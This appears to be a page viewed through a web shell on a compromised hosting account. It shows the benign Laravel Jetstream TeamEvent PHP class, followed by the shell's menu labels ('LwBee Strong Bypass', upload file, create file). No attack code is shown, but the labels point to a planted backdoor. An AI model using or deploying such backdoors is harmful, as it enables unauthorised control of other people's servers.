/home/storage/f/3f/a5/aloic1/public_html/core/vendor/laravel/jetstream/src/Events/TeamEvent.php
<?php
namespace Laravel\Jetstream\Events;
use Illuminate\Broadcasting\InteractsWithSockets;
use Illuminate\Foundation\Events\Dispatchable;
use Illuminate\Queue\SerializesModels;
abstract class TeamEvent
{
use Dispatchable, InteractsWithSockets, SerializesModels;
/**
* The team instance.
*
* @var \App\Team
*/
public $team;
/**
* Create a new event instance.
*
* @param \App\Team $team
* @return void
*/
public function __construct($team)
{
$this->team = $team;
}
}
@LwBee Strong Bypass
Upload File
Create New File